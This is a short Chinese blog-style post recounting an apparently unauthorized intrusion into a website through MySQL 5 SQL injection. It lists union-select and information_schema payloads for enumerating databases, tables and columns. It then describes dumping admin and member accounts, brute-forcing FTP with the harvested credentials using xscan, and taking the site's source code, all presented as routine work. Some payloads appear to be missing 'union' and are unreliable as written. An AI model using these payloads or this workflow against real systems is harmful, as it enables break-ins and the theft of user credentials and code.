一次简单的入侵，权作Mysql5注射备份

　　找注射点，判断字段数就不提了。

　　判断下权限，非root连，没有load_file()的权限，不能select into outfile,幸好mysql版本是5.

　　获取库名

　　and 1=2 union select 1,2,3,database(),5....,87/*

　　或者

　　and 1=2 select SCHEMA_NAME from information_schema.SCHEMATA limit 0,1/*

　　and 1=2 select SCHEMA_NAME from information_schema.SCHEMATA limit 1,1/*

　　----------------------------------------------------------------------------------------------

　　获取表名：

　　数据库名转换成hex：admin=0x61646D696E

　　and 1=2 select TABLE_NAME from information_schema.TABLES%20where%20TABLE_SCHEMA=0x61646D696E%20limit 0,1/*

　　。。。依次往下爆

　　------------------------------------------------------------------------------------------------

　　获取字段值：

　　表 admin=0x61646D696E

　　and 1=2 select COLUMN_NAME from information_schema.COLUMNS%20where%20TABLE_NAME=0x61646D696E%20limit 0,1/*

　　---------------------------------------------------------------------------------------------------

　　爆出管理员帐号后，发现登录不了后台。于是又爆了10套member帐号。整理了下帐号和口令，扔xscan跑ftp口令，2分钟后拿到ftp权限。只是要源代码，到此收工。没技术含量！